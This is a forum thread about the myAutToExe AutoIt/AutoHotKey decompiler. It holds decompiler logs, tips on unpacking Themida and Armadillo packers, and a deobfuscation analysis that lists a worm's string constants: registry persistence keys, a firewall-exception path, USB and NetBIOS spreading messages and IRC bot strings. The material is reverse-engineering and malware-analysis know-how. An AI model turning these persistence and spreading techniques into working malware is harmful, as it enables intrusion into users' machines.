Improved AutoIt3 Decompiler / myAutToExe Decompiler

[cw2k]

Bad news I was about finishing a new release - with new features like scan/manually enter the script start AutoIT Signature or even scan for it - for better modification of modified au3-exe's. But though some bad coincidences it got lost - i.e. I need to reprogram it. So how it happened

1. I VB6 I normally set in the options to 'save the project each time before I start/compile it ' but due to I was on an other computer there was the default 'When the program starts - Don't save'.
2. I didn't save from time to time and also not before sending the system to hibernation
3. Switch of the power 2-3 seconds to early - before the RAM->HD save was complete
And so I could resume it anymore and had to reboot - and of course lost all unsave work.

I'm writing for you to know and to maybe avoid a painful repetition of this lessen.

[Nodens]

Hello,

I've been trying to decompile an AutoIt script that's been compiled with 3.2.10.0 and packed with Themida 1.945.
This is the log:

Code: Select all

================================================================================
myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.5 build(98)
================================================================================
Unpacking: X:\GLoader\package\gloader_orig.exe
Scanning for AutoIt Signature: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D    £HKΎ˜lJ©™LS
†ΦH}

---> ScriptStartOffset: 000EE200
      EndOf_PE-ExeFile : 000EE200
Extracting ExeIcon/s to: "X:\GLoader\package\gloader_orig.ico"
000EE213 -> SubType: 0x41  AU3!
~ Note:  The following offset values are were the data ends (and not were it starts) ~
000EE217 -> New tokenised AutoIt script found.
Script is password protected!
000EE227 -> Password/MD5PassphraseHash: 83566369BAF550CD75A7CF9B91F2AB5A
            ƒVciΊυPΝu§Ο›‘ς«Z
MD5PassphraseHash_ByteSum: 00000000  '+ 2477' => decryption key!
------------ Processing Body -------------
=== > Processing FILE: #1
000EE22B -> ResType: FILE
000EE255 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
000EE2B7 -> CompiledPathName: L:\Users\Someone\AppData\Local\Temp\autE8C9.tmp
000EE2B8 -> IsCompressed: True  (01)
000EE2BC -> ScriptSize Compressed: 0000AF44  Decimal:44868
000EE2C0 -> ScriptSize UnCompressed(used to seek to next file): 000391D0  Decimal:233936
000EE2C4 -> ADLER32 CRC of unencrypted script data: 2089B60E
000EE2D4 -> FileTime (number of 100-nanosecond intervals since January 1, 1601)
    pCreationTime:  01C92F5D636ACE34  16.10.2008 7:4:10 [317]
    pLastWrite   :  01C92F5D639486AC  16.10.2008 7:4:10 [591]
000EE2D4 -> Begin of script data
Decrypting script data...
Calculating ADLER32 checksum from decrypted scriptdata
   OK.
JB LZSS Signature:EA06
Compressed scriptdata written to X:\GLoader\package\gloader_orig.pak
Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

Saving Logdata to : X:\GLoader\package\gloader_orig_myExeToAut.log


I have been working a few days now in unpacking it from Themida (I'm guessing that's what messes up the decompiler
but it's begining to get quite the hassle and I need to decompile that script faster. I am up to the point where I have a
dump that seems like it contains the AutoIt code but isn't working (I'm guessing there's still something wrong with the OEP)
but in theory the script should be extractable from there (if I understood the info you have already provided correctly).
The dump is not recognized by the decompiler, probably due to corrupted or missing signature...

I have uploaded both the original packed script executable and my latest PE dump of the unpacking process here:
http://rapidshare.com/files/210990529/package.rar

I would appreciate any help:)
Nodens


EDIT: I found out something interesting. your decompiler can actualy decompile the script perfectly, IF it's not run on Vista x64. So it's either not compatible with x64 or something on Vista. I tried it on my Vmware 32b XP VM that I use for RE and it worked fine there...

[cw2k]

Code: Select all

Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

To decompress the script data myAutToExe uses 'LZSS.exe'. Seems that this doesn't runs under vista x64. Please check this. ('LZSS.exe' is a console app so run it under cmd.exe to see it's output).
Guess Vista is somehow more strict about PE-Files or don't supports align:0x400 - next release I'll remove this compiled options: "/merge:.rdata=.text /merge:.data=.text /Section:.text,ERW /align:0x400"

[rager]

O.o should we anticipate this release? I cannot wait, im anticipating already lol

[Nerdmaster]

First off, I'm a big fan of this project. Not a lot of people realize how important it can be to allow reverse-engineering (for fun, education, and/or security purposes).

I cannot for the life of me get the current version to work on a particular application. The author has hidden serious malware in his programs in the past (http://forums.gleemax.com/showthread.php?t=1117133), but he seems to have gotten much smarter since this exploit was found. For starters, he's actually the first person I saw using an obfuscator that did the funny variable names described earlier (All names were a combo of the letter "O" and the number 0). More recently, either he's gotten a new packer that myAutToExe isn't able to handle, or else a newer version of AutoIt has done something differently. Either way, I can't decompile this software.

Here's my log:

Code: Select all

================================================================================
myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.5 build(99)
================================================================================
Unpacking: C:\Program Files\CBS Soft\CBS Bot\LauncherGUI.exe
AlternativeSigScan for 'FILE'-signature in au3-body...
Scanning for FILE-(old)signature: FF 6D B0 CE    ÿm°Î
...not found.
Scanning for FILE-(new)signature: 6B 43 CA 52    kCÊR
Modified Script Type 3.2.5+ found.
001665A9 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
Seeking back to script start position...
AU3_Signature: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D   £HK¾˜lJ©™LS
†ÖH}

---> ScriptStartOffset: 00166554
      EndOf_PE-ExeFile : 00241000
Extracting ExeIcon/s to: "C:\Program Files\CBS Soft\CBS Bot\LauncherGUI.ico"
00166567 -> SubType: 0x41  AU3!
~ Note:  The following offset values are were the data ends (and not were it starts) ~
0016656B -> New tokenised AutoIt script found.
Script is password protected!
0016657B -> Password/MD5PassphraseHash: 0FD541DCE80C340668C9A0A749FBC7EB
            ÕAÜè4hÉ §IûÇë
MD5PassphraseHash_ByteSum: 00000000  '+ 2477' => decryption key!
------------ Processing Body -------------
=== > Processing FILE: #1
0016657F -> ResType: FILE
001665A9 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
00166603 -> CompiledPathName: C:\DOCUME~1\Alberto\LOC繽椾ᰳ䡹递誶칥㖽뎅棘琰ﶼ캖䘰⽁᷌
00166604 -> IsCompressed: True  (46)
00166608 -> ScriptSize Compressed: B83686B4  Decimal:-1204386124
0016660C -> ScriptSize UnCompressed(used to seek to next file): 816F87B1  Decimal:-2123397199
00166610 -> ADLER32 CRC of unencrypted script data: CBF7A6C6
00166620 -> FileTime (number of 100-nanosecond intervals since January 1, 1601)
    pCreationTime:  AE976307913C01C9  0.0.0 0:0:0 [0]
    pLastWrite   :  AE97851EEC7001C9  0.0.0 0:0:0 [0]
00166620 -> Begin of script data
Invalid procedure call or argument

Saving Logdata to : C:\Program Files\CBS Soft\CBS Bot\LauncherGUI_myExeToAut.log


That "Invalid procedure call or argument" totally stumped me. It's also clear that something else is going on here, what with the corrupt path name. I tried to use VB6 to step through the code and see what was going on, but I had no luck with that - for some reason I just can't get that portable runtime to work for me (crashes trying to display the main form). I then tried to use olly to pull out the script data while it was running, but I didn't really have any luck there, either. I couldn't really figure out exactly what to grab.

Attached is the executable (7-zipped) I'm dealing with. I'd love to know what I'm missing here. Is the bot author being clever and finding better ways to hide his malware, or is it just something stupid I'm doing?

[Nodens]

Code: Select all

Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

To decompress the script data myAutToExe uses 'LZSS.exe'. Seems that this doesn't runs under vista x64. Please check this. ('LZSS.exe' is a console app so run it under cmd.exe to see it's output).
Guess Vista is somehow more strict about PE-Files or don't supports align:0x400 - next release I'll remove this compiled options: "/merge:.rdata=.text /merge:.data=.text /Section:.text,ERW /align:0x400"

Correct. LZSS.exe wont run in my Vista x64 rig:)

[cw2k]

@Nerdmaster
LauncherGUI.exe is packed with armadillo. Yes I know the way to unpack this is a little 'Nerd like' but since hehe . I write how to to on some previous post.
And about that malware post (warning) - yes of course that is possible. But if it possible to get hit by lighting in a storm it's no reason that this MUST happen. I my eyes that post is bullshit, ppl 'concerned' about security to make them selves more important (or sometimes to distract attention from something they like to hide.)

@Nodens
Vista *urgh*
I'm currently not on my homePC were I have VC++ installed. If you need it that quick compile it yaself or find someone how can do this for you.

[zebrastation2009]

Hi

This an strange for me.

I read all of notes about armadillo pack in readme.txt and do about 10 fails.

Does some one do unpack this file and please guide me step-by-step for redo it by myself.

[Nerdmaster]

@Nerdmaster
LauncherGUI.exe is packed with armadillo. Yes I know the way to unpack this is a little 'Nerd like' but since hehe . I write how to to on some previous post.
And about that malware post (warning) - yes of course that is possible. But if it possible to get hit by lighting in a storm it's no reason that this MUST happen. I my eyes that post is bullshit, ppl 'concerned' about security to make them selves more important (or sometimes to distract attention from something they like to hide.)

First, yes, I know unpacking is easy (and nerdy), and this wouldn't present a problem if I knew what I was doing. My problem is that I don't seem to be able to figure out how to do this. I tried to follow your guide, but I guess I don't know quite how to use Olly to get all the data.

As for the malware post, you'll have to take my word on it. I'm the one who discovered the malware in the first place: http://forums.gleemax.com/showthread.php?t=1099233. The old versions of the code I gave you had some pretty interesting exploits for stealing user accounts. In fact it's for reasons like this that I continue to try and unpack this source. For a while, the bot would actually contact a website and send over your user and password information in plain text!

[zutto]

Hi

i am having problems decompiling "bot" for me, i want to sneak up bit the source, since i am intrested of the rotation function, but i have had no succes on decompiling it so i tought you could help me bit

Thanks.

[Nerdmaster]

Never mind - I must have been missing something obvious. I just pulled memory from Olly and ran it through myAutToExe without any problems. Guess I was having a bad day or something

[cw2k]

Since so many ppl ask me about I finally made some step by step manual on how to dump autoit scripts that were packed by armadillo.
http://myauttoexe.angelfire.com/Doc/Dum ... adillo.htm

I also just uploaded a new version of myAuToExe with the new 'Regular Expression Renamer'. With this you are able to rename obfuscated names like

Code: Select all

Global $000000000000000000 = "loading.jpg"
Global $0000000000000O0O00 = "S00000000OOO0OO00OOO00: Non corrispondono il nome in $0000000000O0O0OO00O00 ,"


to

Code: Select all

Global $gStr0000 = "loading.jpg"
Global $gStr0001 = "Func0000: Non corrispondono il nome in $GUI_0000 ,"


by the use of Regular Expressions.

[Nerdmaster]

Since so many ppl ask me about I finally made some step by step manual on how to dump autoit scripts that were packed by armadillo.
http://myauttoexe.angelfire.com/Doc/Dum ... adillo.htm

This is excellent, thank you! I figured it out on my own, but this guide will definitely help people out a lot.

I also just uploaded a new version of myAuToExe with the new 'Regular Expression Renamer'.

I think there's something buggy with the renaming, as it wasn't able to catch all the variables in a test script I put together. I'll attach my simplistic example.

You should know I've got something very similar put together in Ruby. It doesn't rename functions (hopefully I can do that soon), but it renames variables in a relatively intelligent manner. For instance, if $O00OOO0000OO is set to "Loading...", and it is never assigned to anything but "Loading...", the variable is ripped out and placed in-line rather than being a variable.

I'll happily link my article if you're interested, but I didn't want it to seem like I was trying to step on your toes.

[cw2k]

i am having problems decompiling "bot" for me...

Hmm the same modification as WoWInfinity uses. Change the FILE-Decryption Key (that is normally 0x18EE) to 0x0000 or DL the newest myAutToExe I just upped. I improved some small things that makes it to better come along with mods like this.

Ah yes and just for to know via google I found were that file comes from:
http://www.autoitscript.com/forum/index ... t&p=628182

[zutto]

i am having problems decompiling "bot" for me...

Hmm the same modification as WoWInfinity uses. Change the FILE-Decryption Key (that is normally 0x18EE) to 0x0000 or DL the newest myAutToExe I just upped. I improved some small things that makes it to better come along with mods like this.

Ah yes and just for to know via google I found were that file comes from:
http://www.autoitscript.com/forum/index ... t&p=628182

works like charm, thanks!

is there way to deobfucate scripts what are .au3 [+ .tbl] allready ?

[cw2k]

is there way to deobfucate scripts what are .au3 [+ .tbl] allready ?

I'm currently working on better&faster deobfucation - and just upped this new version. Hehe feel free to be beta tester.

[zutto]

is there way to deobfucate scripts what are .au3 [+ .tbl] allready ?

I'm currently working on better&faster deobfucation - and just upped this new version. Hehe feel free to be beta tester.

didnt work better than earlier version :/..

still leaving me all this crap

got any tips getting that crap out make script work without editing 60000 lines by hand?

http://pastebin.com/m112de9ea

[sarm2005]

HI, I would first like to say this decompiler is very useful and I have been having lots of success using it.

However I am having trouble decompiling the attached ahk script. Any help would be appreciated. Thanks.

[falseaccount]

Hello,

First, Thanks for this usefull program it is the best in its class (I do not know else).

i'am using the version 2.7.0.104 of myAutToExe and i am trying to decompile this .exe compiled with the oldest version of ahk 1.0.47.6

file1.7z

and its not working
The .log file :

myExeToAut.7z

If you have one moment, can you look at this please ?


Thanks you

[cw2k]

HI, I would first like to say this decompiler is very useful and I have been having lots of success using it.

However I am having trouble decompiling the attached ahk script. Any help would be appreciated. Thanks.

Thanks for pointing on that. It was only a minor bug - however DL current version now it's working.

[cw2k]

i'am using the version 2.7.0.104 of myAutToExe and i am trying to decompile this .exe compiled with the oldest version of ahk 1.0.47.6

file1.7z

and its not working

Here it's working also I can't see any problems in the ya log

[cw2k]

I also just uploaded a new version of myAuToExe with the new 'Regular Expression Renamer'.

I think there's something buggy with the renaming, as it wasn't able to catch all the variables in a test script I put together. I'll attach my simplistic example.

Nice. I'll add that as test example.
Well the given example expression in myaut2exe was that
"S[O0]{21}" -> "Func"
what will only catch strings, that are 21 chars long.

"S[O0]{1,21}" -> "Func" is more generic - but it will catch also false positive
Global $Var000C = "Sorry" <- before
Global $Var000C = "Func0001rry" <- after

but RegExp Term like this:
"S[O0]{14,21}" -> "Func"
should work fine.

You should know I've got something very similar put together in Ruby. It doesn't rename functions (hopefully I can do that soon), but it renames variables in a relatively intelligent manner. For instance, if $O00OOO0000OO is set to "Loading...", and it is never assigned to anything but "Loading...", the variable is ripped out and placed in-line rather than being a variable.

I'll happily link my article if you're interested, but I didn't want it to seem like I was trying to step on your toes.

[/quote]
I found ya article after I made the RegExp Renamer module. Ruby is for Linux - and for all the windozer and ppl that are to lazy to boot up there ubuntu,debian... Is there are ruby windows interpreter/compiler? (Include a link to ya post so it is easier to use for newbies.) I had a look at the script without running it - looks nice.

And about replacing Consts hmm regarding the example:
Const $O00OOO0000OO ="Loading..."
Well to name it $Str_Loading(and ensure that's unique) some instead of a not so speaking name $Str_0001 would be nice. But replacing all $O00OOO0000OO with "Loading..." - these const's were made by the developer and not the obfuscator, so they have their reason(maybe to easier translate the app).

Anyway nice to see other ppl ou there that 'create'.

[falseaccount]

i'am using the version 2.7.0.104 of myAutToExe and i am trying to decompile this .exe compiled with the oldest version of ahk 1.0.47.6

file1.7z

and its not working

Here it's working also I can't see any problems in the ya log

Thanks for the script.

usually its works with others script, but for it I cannot decompile them, i dont know why is working for you

[cw2k]

Thanks for great decompiler!
I obtained the virus, which is not determined by Symantec.
Free scanner “CureIt” from Dr. Web classified it as “Win32.HLLW.Autoruner.based”.
I sent this virus sample to Symantec at 02-feb-09, but week was past, it they added only in the week - 10-feb-09...

This virus - exe-file, packed BY UPX 3.0:

csrcs.zip

Finally I've some time to look this.
This file is obfuscated twice the second 'layer' is Van Zande 1.0.24
and the first is EncodeIt 2.0.

To major problem is/was EncodeIt 2.0 since it is more uncommon and at the time it was used there were no tokenized scripts or other obfuscater.
For example started all EncodeIt scripts like this:
Global Const $M8D5A7A2F6C5B4F29 = Int(99/3+15*100/4-13^2+81/3-17-245+99/3+15*100/4-13^2+81/3-17)
so I made myauttoexe to used "Int(99/3+15*100/4-13^2+81/3-17-245+99/3+15*100/4-13^2+81/3-17)" to recognize EncodeIt scripts
But I decided to detokenise numbers into hex it become this:
Global Const $gConst0000 = Int(0x0063 / 3 + 0x000F * 0x0064 / 4 - 0x000D ^ 2 + 0x0051 / 3 - 0x0011 - 0x00F5 + 0x0063 / 3 + 0x000F * 0x0064 / 4 - 0x000D ^ 2 + 0x0051 / 3 - 0x0011)
and so EncodeIt wasn't recognized anymore.

There were also other things like string that were always 'single quoted' but become now "double quoted" - however.

Code: Select all

Deobfuscating Encodeit 2.0...
Renaming Consts...
Renaming Dims...
Renaming Globals...
Search'n'replace strings:
$gConst0002    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCF86D78DD67A7A1A9DE123A6219AF1EF57624D6E9C92039C534AF51C8BDA73AFFC6262E0C1C1DDB7E5C73935413F9FD764317C4DD0133331AFBED6B4DE974FDD160BCE2C3E502C8EC3FAE8D5B7E327E509"
$gConst0003    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419290F01C914ADC0EB50FB95FCAFCF4EC35271A8624D15A1ED50CC786D78DD77A79649AE123A6569AF6EF59624D6EEB95749C554A8E1CF9DA72AF8C1E10E0C1C1DDB79DC73D35343F9CD76B317C48D5133331ACBED3B1DA9737D8130BC92B3D502CF2B0"
$gConst0004    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB8107540E390F21C914AAD0EB773C55FCBFBF0EC36271F8623D1261ED10BCF86D48DA37A79649BE124A6209D82EF21624D6E9F92039D524AF51C8ADA73D1F96262E0C1C1DDB79DC73D35453F9CD010317C48D4134E31AFBED7B1DC974FDD160BCA2B4D"
$gConst0005    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419295F51C914AAB0EB573C15FCBFBF3EC3426188620D15B1ED10BCF86D48DD37A79649DE123A6259D82EF21624D6E9D92049C564AF51C8ADA73D1F96263E7C6C1DDB79AC73D35403F9FD76B317848D2133330DBBED6B4D99737D814"
$gConst0006    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F51C914AD60EB50FC15FCAFCF0EC34271D8623D05B1ED10BCF86D48DD17A7A1A9FE657A6519AF1EA22624E6F9A95749C544A8E1D82DA73D1FC6262E0C5C1DDB09FC73D35463AEBD714317C48D4133230ACBED7B1DB"
$gConst0007    "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
$gConst0008    "040a,080a,0c0a,100a,140a,180a,1c0a,200a,240a,280a,2c0a,300a,340a,380a,3c0a,400a 440a,480a,4c0a,500a"
$gConst0009    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
$gConst000A    "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$gConst000B    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB810754192908C1C9134A80EB673B9"
$gConst000C    "1,18941112141573214 <==HaRaKiRi=WoRm=&=BoT==[=O  15Ver "
$gConst000D    "3[DlRegExec] 4Error, probablemente no bajo bien o un proceso lo blokio"
$gConst000E    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
$gConst000F    "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
$gConst0010    "POINLERINLONID654SE65R4FLJNHSEKJNFVKSEHKUHKUHFKUHLQWPEOFPOMZSMPFO"
$gConst0011    "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
$gConst0012    "0409,0809,0c09,1009,1409,1809,1c09,2009,2409,2809,2c09,3009,3409"
$gConst0013    "10[plugin]3 plugin no resopndio en el periodo de un minuto"
$gConst0014    "3[Shellexecute]4 error no se pudo ejecutar el archivo 4"
$gConst0015    "3[DlRegExec]4 archivo fallo al bajar o tamao incorrecto"
$gConst0016    "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
$gConst0017    "HKLM\Software\Microsoft\Windows\CurrentVersion\Runservices"
$gConst0018    "HKCU\Software\Microsoft\Windows\CurrentVersion\Runservices"
$gConst0019    "[HARAKIRI] Ip Remover (wan) activated, Commited Harakiri!"
$gConst001A    "3[UsbSpread] 4,1Usb2System3, DriveDrivename=12 "
$gConst001B    "3[Netbios] 4Activado, 3Resume/Startscanip=4 "
$gConst001C    "3[Netbios] 4Iniciado, 3Resume/Startscanip=4 "
$gConst001D    "Q9VSD1DSS4SDF5G64HFSDSDF79AF6G54B984FGSDFBASASASASSD"
$gConst001E    "3[UsbSpread] 2InActivo, 3usb infections=4 "
$gConst001F    "3[DlRegExec] Algun 4proceso estaba 4abierto"
$gConst0020    "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
$gConst0021    "http://www.whatismyip.com/automation/n09230945.asp"
$gConst0022    "3[Netbios] 4Rango InZaNe, 3startscanip=4 "
$gConst0023    "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
$gConst0024    "3[UsbSpread] 4Activo, 3usb infections=4 "
$gConst0025    "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
$gConst0026    "3[Netbios]4,1Drive2System3, Drivename=12 "
$gConst0027    "FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25"
$gConst0028    "3[Netbios] 2Desactivado, 3Ultimo ip=4 "
$gConst0029    "3[Netbios] 2InActivo, 3IpInfections =4 "
$gConst002A    "10[plugin]4 Plugin no existe, upload first"
$gConst002B    "KS54EfgR911SDFSD49R8dV1S3H84SDDD4F51AShD684J8"
$gConst002C    "3[Netbios] 4Rango B, 3startscanip=4 "
$gConst002D    "3[Netbios] 4Rango A, 3startscanip=4 "
$gConst002E    "3[Netbios] 2Detenido, 3Ultimo ip=4 "
$gConst002F    "3[Shellexecute] se ejecuto el archivo 4"
$gConst0030    "3[DlRegExec] regkey encontrado valor:4 "
$gConst0031    "A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d"
$gConst0032    "3[HARAKIRI] 4,5auchhhhhhhh uuuuuf! plop!"
$gConst0033    "9df51gftr1h19gh650gh5j6046j540fof0o4yu540f"
$gConst0034    "981NTY81KL1DF36DRG684F0080H94ERG498NMJ4SY9"
$gConst0035    "gf854h1t11h1r8601t08j90sd80ew0kty0j4tyj004"
$gConst0036    "3[Netbios] 4Activo, 3Currentip=4 "
$gConst0037    "3[Netbioscopy]4 ERROR al copiar de4 "
$gConst0038    " 237151412114981 "
$gConst0039    "9DFG81R0Z1XC1BVN3651OUT51QW198C47651H9581"
$gConst003A    "3[Netbioscopy] archvio copiado de4 "
$gConst003B    "3[Dlplugin]4 error al bajar archivo"
$gConst003C    "Q4gVgYOdG74CdFGfn6LG5kf5KGDDDSWESddd5AD"
$gConst003D    "LLFPD879S54D6B84654654CVBCVB654CVB654CB"
$gConst003E    "3[DlRegExec] Ejecutado con 4exito"
$gConst003F    "llllsjknaKHjiBIUBikbiybIKLyilUGugLgil"
$gConst0040    "pkJFR951pKHf466847GseJrUoBs85Dd57D777"
$gConst0041    "lo5F46bvf468rhG4A66tha84G684NJY684AG4"
$gConst0042    "3[Reg] Delete HKCU/CV/RunServ=4 "
$gConst0043    "3[Reg] Delete HKLM/CV/RunServ=4 "
$gConst0044    "AADSFsbDG4nh6hSDFweD6jSD16DD4w843Gn1"
$gConst0045    "LKAJSf6DF654fadf4SD0GSGeg5DFGsr46gS"
$gConst0046    "llLLLGS436QWE6ZC654E6546FFSS9d8h7t"
$gConst0047    "Adgf45rwKJK87H883210BHhBH05BGFnbvg"
$gConst0048    "Q9V1S45G64H79AF6G54B984FGBASASASAS"
$gConst0049    "3[Reg] Delete HKLM/P/E/Run=4 "
$gConst004A    ":*:Enabled:Windows Life Messenger"
$gConst004B    "3[Reg] Delete HKLM/CV/Run=4 "
$gConst004C    "3[Reg] Delete HKCU/CV/Run=4 "
$gConst004D    "nickname is owned by someone else"
$gConst004E    "408178571CB7BBE0DC1D7B2D0C42B9AE"
$gConst004F    "3[Reg] HKLM/pol/Expl/Run=4 "
$gConst0050    "HKLM\Software\Microsoft\DRM\amty"
$gConst0051    "3[Dlplugin]2 archivo existe"
$gConst0052    "3[Dlplugin]2 archivo bajado"
$gConst0053    "3[ping] Online, respuesta a "
$gConst0054    "http://checkip.dyndns.org/?rnd1="
$gConst0055    "http://www.whatismyip.com/?rnd1="
$gConst0056    "C:\encratep\compilation\out.exe"
$gConst0057    "FD8dcn654F6J465h4fg698k9l9k69ss"
$gConst0058    "S5J465RT4654GFA5HGRJT54JR78I14C"
$gConst0059    "@netstat.exe %1 %2 | find /v "":"
$gConst005A    "3[UsbSpread] 2Desactivado"
$gConst005B    "3[Regread] RegValue is =4 "
$gConst005C    "R85EfzMkOX100kyp5VrE4eEKVKEEKR"
$gConst005D    "978QIOER6446ADFGLJKGHFA22VBNVB"
$gConst005E    "Q9V7U2s4U9m1H5A6T7K5T4c15Wf9D5"
$gConst005F    "Ki8sdtPm4sQN1g2SBs321PTO4wVeU5"
$gConst0060    "S87NXXgerGHuopFGF554imxFGHcGza"
$gConst0061    "Z9Z9DE4df98h4G6H46df65g4F4444F"
$gConst0062    "3[UsbSpread] DriveName=12 "
$gConst0063    "3[Reg] HKLM/CV/Runserv=4 "
$gConst0064    "3[Reg] HKCU/CV/Runserv=4 "
$gConst0065    "M6A6I7L5S18I6D12FM168DES6N16S"
$gConst0066    "3[X] $Drive2system_expchan "
$gConst0067    "040c,080c,0c0c,100c,140c,180c"
$gConst0068    "http://geoloc.daiguo.com/?ip="
$gConst0069    "H4D8D5U96581H3Y321VBNM1M1MBN"
$gConst006A    "Yz00yzlslnnnlsd654fSDF5654SB"
$gConst006B    "3[UsbSpread] 4Activado"
$gConst006C    "3[UsbSpread] 2Detenido"
$gConst006D    "3[UsbSpread] 4Iniciado"
$gConst006E    "SjJA54ASD8646A2Sdsasd1ASDsb"
$gConst006F    "3[X] $usb2system_expchan "
$gConst0070    "7w7wq8T977T7TU9I7O3UI4P4IU"
$gConst0071    "P4A9uK3i6I4V2V2VB1JH6548C1"
$gConst0072    "a64DGF684SDFf6j4683201rht0"
$gConst0073    "951PJKFZX753QWEFGM258VHTRY"
$gConst0074    "9Z9X92Bb2B92h94H4K75J5Kj5n"
$gConst0075    "ping -n 5 -w 250 127.0.0.1"
$gConst0076    "3[Netbios] PublicIP=4 "
$gConst0077    "3[Reg] HKLM/CV/Run=4 "
$gConst0078    "3[Reg] HKCU/CV/Run=4 "
$gConst0079    "Scripting.FileSystemObject"
$gConst007A    "Nickname is already in use"
$gConst007B    "lJ3unI78hCE988eo87wt8cWET"
$gConst007C    "A0askdh8WDhoH111o8h8DW345"
$gConst007D    "System Volume Information"
$gConst007E    "3[Reg] Shell run =4 "
$gConst007F    "3[Reg] Key Readed= 4"
$gConst0080    "3[X] $ircserverchannel "
$gConst0081    "Q7A4Z1W8S5X2E8D5C2R8F5V2"
$gConst0082    " /AutoIt3ExecuteScript """
$gConst0083    "3Z2X1C9ZX51C7Z4X1CZ9X5C1"
$gConst0084    "9P6L3M8I5J2N7Y4G1V7T5J3M"
$gConst0085    "987ERT6D5F4G3C2V1B6D5F4G"
$gConst0086    "3[Closed wintitle]4 "
$gConst0087    "5<====[processos]====>"
$gConst0088    "3[Reg] 4key Deleted"
$gConst0089    "3[Reg] keysfound=4 "
$gConst008A    "3[msnlifecontacts]4 "
$gConst008B    "3[X] $netbios_expchan "
$gConst008C    "0407,0807,0c07,1007,1407"
$gConst008D    "I9O87PKL654M3B32M9Z5XC1"
$gConst008E    "Yz1slnnnlsd654fSDF5654S"
$gConst008F    "KS54911S49R8dH84S4F84J8"
$gConst0090    " MB, 3Free Space=4 "
$gConst0091    "3[Update]4 updaten!"
$gConst0092    "3[all win titles]4 "
$gConst0093    "3[exploit channels]4 "
$gConst0094    "3[exploit channels]2 "
$gConst0095    "3[Reg] 4keys added"
$gConst0096    "3[msnlifecontacts] "
$gConst0097    "3[X] $firstvhostauth "
$gConst0098    "1F117V1N7CGNGZ4G4N6G84"
$gConst0099    "Vj681VEW66g5h4GH4F6g5s"
$gConst009A    ", 3IpInfections=4 "
$gConst009B    "5<=[processos fin]=>"
$gConst009C    "3[X] $ircserverport "
$gConst009D    "7Q5S3V9T5D1ZS464DFDSDF"
$gConst009E    "3[X] $siteipspread2 "
$gConst009F    "shell\explore\Command="
$gConst00A0    "M13FGMSGM684S68M46G84"
$gConst00A1    "G3F8138J318JC381CHJCJ"
$gConst00A2    "\Microsoft\Messenger\"
$gConst00A3    "M8Y77V69S8488S689O99Q"
$gConst00A4    "3[X] $ircserverdns "
$gConst00A5    "3[X] $siteharikiri "
$gConst00A6    "3[X] $siteipspread "
$gConst00A7    "C:\WINDOWS\system32\"
$gConst00A8    "PpMnKJN5df5G4i4321vV"
$gConst00A9    "95A5756335A574A364C6"
$gConst00AA    " MB 3Freespace=12 "
$gConst00AB    "[System Idletime] "
$gConst00AC    "shell\open\Default=1"
$gConst00AD    "3[X] $botpassword "
$gConst00AE    "3[X] $usb_expchan "
$gConst00AF    "3[X] $Sitecomand1 "
$gConst00B0    "3[X] $Sitecomand2 "
$gConst00B1    "M3MPP1O21V984VCCCVB"
$gConst00B2    "InternetCloseHandle"
$gConst00B3    "3[win titles]4 "
$gConst00B4    "stringClosewintitle"
$gConst00B5    ", 3Lifetime=4 "
$gConst00B6    "shell\open\Command="
$gConst00B7    "Q7M3W8B2P9Z4A6L5S4F"
$gConst00B8    "3[filevercion] "
$gConst00B9    "3[X] $siteonline "
$gConst00BA    "9P1ZQ73MT8V2L6A4G5"
$gConst00BB    "Commited Harakiri!"
$gConst00BC    "LSMD155V86h87EHhHH"
$gConst00BD    "pOjjcASCSC5SC4sc4b"
$gConst00BE    "86h87EHhHLSMD155VH"
$gConst00BF    "3] 3Label=12 "
$gConst00C0    "con_espada_samurai"
$gConst00C1    "[System Uptime] "
$gConst00C2    "3[FileAttrib] "
$gConst00C3    "[HARAKIRI] Adios."
$gConst00C4    "3[wan IP's]4 "
$gConst00C5    "6E523163793968624"
$gConst00C6    "3[X] $siteusb2 "
$gConst00C7    " /c dir /b /s /a "
$gConst00C8    "no nickname given"
$gConst00C9    "is currently used"
$gConst00CA    "oOm2sdk55GDE8cVp"
$gConst00CB    "killpc-name&user"
$gConst00CC    "Ip Remover (wan)"
$gConst00CD    "InternetReadFile"
$gConst00CE    "3[Country] 4"
$gConst00CF    "regcleanharakiri"
